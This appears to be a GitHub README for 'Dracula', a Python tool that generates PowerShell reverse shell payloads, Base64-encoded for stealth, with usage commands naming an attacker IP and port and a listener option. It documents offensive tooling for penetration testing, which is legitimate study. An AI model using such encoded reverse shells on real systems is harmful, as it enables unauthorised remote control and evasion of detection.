WIP, HASNT PROPERLY BEEN TESTED ON OTHER SYSTEMS works as of now
Dracula is a Python-based tool designed to generate reverse shell payloads using PowerShell and Command Prompt. It provides options to create encoded payloads for stealth and supports direct connection to a target system once the payload is executed.
- Generates PowerShell-based reverse shell payloads
- Supports both plain text and Base64 encoded payloads
- Allows automatic connection to a target after execution
Ensure you have Python installed, then clone this repository:
git clone https://github.com/chet-ag09/dracula
cd dracula
Install any necessary dependencies:
pip install -r requirements.txt
Run the script using:
python dracula.py
-
Generate a reverse shell payload:
Dracula >> -IP <attacker-ip> -PORT <port> -OUTFILE <output-file>
-
Generate an encoded payload (Base64):
Dracula >> -IP <attacker-ip> -PORT <port> -OUTFILE <output-file> -ENCODED
-
Display payload directly:
Dracula >> -IP <attacker-ip> -PORT <port>
-
Display an encoded payload:
Dracula >> -IP <attacker-ip> -PORT <port> -ENCODED
-
Start a listener after payload execution:
Dracula >> -IP <attacker-ip> -PORT <port> -CONNECT
To generate a Base64 encoded payload for a reverse shell:
Dracula >> -IP 192.168.1.10 -PORT 4444 -OUTFILE shell.bat -ENCODED
To start a listener after the payload is executed:
Dracula >> -IP 192.168.1.10 -PORT 4444 -CONNECT
This tool is intended for educational and ethical penetration testing purposes only. The author does not take responsibility for any misuse. Use this tool only on systems you own or have explicit permission to test.